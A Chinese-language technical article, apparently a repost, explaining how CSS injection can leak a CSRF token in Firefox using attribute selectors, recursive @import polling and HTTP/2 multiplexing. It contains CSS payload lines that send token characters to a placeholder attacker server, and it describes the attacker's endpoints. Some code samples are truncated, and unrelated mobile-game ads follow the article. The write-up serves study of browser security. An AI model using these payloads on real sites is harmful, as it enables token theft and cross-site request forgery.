本篇文章小编给大家分享一下在Firefox浏览器中利用CSS窃取数据实例,小编觉得挺不错的,现在分享给大家供大家参考,有需要的小伙伴们可以来看看。
为了演示方便,这里假设我们想窃取元素中的CSRF令牌。
css;">
我们无法使用脚本(可能是因为CSP),因此想寻找基于样式的注入方法。传统方法是使用属性选择器,如下所示:
input[name='csrftoken'][value^='a'] { background: url(//ATTACKER-SERVER/leak/a); } input[name='csrftoken'][value^='b'] { background: url(//ATTACKER-SERVER/leak/b); } ... input[name='csrftoken'][value^='z'] { background: url(//ATTACKER-SERVER/leak/z); }
如果应用了CSS规则,那么攻击者就能收到HTTP请求,从而获取到令牌的第1个字符。随后,攻击者需要准备另一个样式表,其中包含已窃取的第1个字符,如下所示:
input[name='csrftoken'][value^='aa'] { background: url(//ATTACKER-SERVER/leak/aa); } input[name='csrftoken'][value^='ab'] { background: url(//ATTACKER-SERVER/leak/ab); } ... input[name='csrftoken'][value^='az'] { background: url(//ATTACKER-SERVER/leak/az); }
通常情况下,攻击者需要重新加载
在2018年, Pepe Vila 提出了一个非常不错的想法,可以在Chrome浏览器中滥用 CSS递归import 方式,通过单个注入点完成相同任务。在2019年,Nathanial Lattimer( @d0nutptr )重新提出了相同 技巧 ,但稍微做了点改动。
简而言之,第一次注入用到了一堆import:
@import url(//ATTACKER-SERVER/polling?len=0); @import url(//ATTACKER-SERVER/polling?len=1); @import url(//ATTACKER-SERVER/polling?len=2); ...
核心思想如下:
1、在一开始,只有第1个@import会返回样式表,其他语句处于连接阻塞状态。
2、第1个@import返回样式表,泄露令牌的第1个字符。
3、当泄露的第1个令牌到达ATTACKER-SERVER,第2个import停止阻塞,返回包含第1个字符的样式表,尝试泄露第2个字符。
4、当第2个泄露字符到达ATTACKER-SERVER时,第3个import停止阻塞……以此类推。
这种技术之所以行之有效,是因为Chrome会采用异步方式处理import,因此当任何import停止阻塞时,Chrome会立即解析该语句并应用规则。
Firefox及样式表处理
前面提到的方法并不适用于Firefox,与Chrome浏览器相比,Firefox对样式表的处理方式大不相同。这里以几个案例来说明其中差异。
首先,Firefox会采用同步方式处理样式表。因此,当样式表中有多个import时,只有当所有import都处理完毕时,Firefox才会应用CSS规则。考虑如下案例:
假设第1个@import返回CSS规则,将页面背景设置为蓝色,后续的import处于阻塞状态(比如永远不会返回任何内容,会挂起HTTP连接)。在Chrome浏览器中,页面会立即变为蓝色,而在Firefox中并不会有任何反应。
我们可以将所有import放在独立的
在上面代码中,Firefox会分别处理所有样式表,因此页面会立刻变蓝色,其他import会在后台处理。
但这里还有另一个问题,假设我们想窃取包含10个字符的令牌:
...
Firefox会立即将10个import加入队列。在处理完第1个import后,Firefox会将带有已知字符的另一个请求加入队列。这里的问题在于,该请求会被加到队列末尾。而在默认情况下,浏览器有个限制条件,到同一个服务器只能有6个并发连接。因此,带有已知字符的请求永远不会到达目标服务器,因为已经有到该服务器的6个阻塞连接,最终出现死锁现象。
HTTP/2
6个连接的限制条件由TCP层决定,因此到单个服务器只能有6个TCP连接同时存在。在这种情况下,我认为HTTP/2可能派上用场。HTTP/2有许多优点,比如我们可以通过单个连接发送多个HTTP请求(也就是所谓的多路传输( multiplexing )),从而大大提升性能。
Firefox对单个HTTP/2连接的并发请求数也有限制,但默认情况下限制数为100(具体设置参考about:config中的network.http.spdy.default-concurrent)。如果我们需要更多并发数,可以使用不同的主机名,强制Firefox创建第2个TCP连接。比如,如果我们创建到https://localhost:3000的100个请求,也创建到https://127.0.0.1:3000的50个请求,此时Firefox就会创建2个TCP连接。
利用方式
现在一切准备就绪,我们的主要利用场景如下:
1、利用代码基于HTTP/2。
2、通过/polling/:session/:index端点可以返回CSS,泄露第:index字符。该请求会处于阻塞状态,直到前一个请求成功泄露第index-1个字符。:session路径参数用来区分多次攻击行为。
3、通过/leak/:session/:value端点来泄露整个令牌。这里:value为获取到的完整值,而不单单是最后一个字符。
4、为了强制Firefox向同一个服务器发起2个TCP连接,这里用到了两个端点,分别为https://localhost:3000及https://127.0.0.1:3000。
5、端点/generate用来生成示例代码。
创建了一个 测试平台 ,目标是通过这种方式窃取csrftoken。
有趣的是,由于我们使用的是HTTP/2,因此攻击过程非常快速,不到3秒就能获取到整个令牌。
米加小镇世界龙年无广告版 安卓版v1.81
米加小镇世界龙年无广告是一款模拟类手游,不少的玩家可能都玩过
部落冲突互通服 安卓版v17.100.1
部落冲突互通服是全球风靡的战争策略手游,连接安卓和iOS服务
我的世界恶魔模组资源包 (EDU HELL)最新版vDEATH
我的世界恶魔版是一款像素风格的开放世界沙盒游戏,游戏中你可以
艺术大亨天天拍卖变富翁 最新安卓版v1.31.0
艺术大亨天天拍卖变富翁是一款非常好玩的模拟经营类手游,在游戏
大型巴士司机游戏 安卓版v2.1.0
大型巴士司机是一款模拟驾驶类游戏,玩家们将在游戏中化身为大巴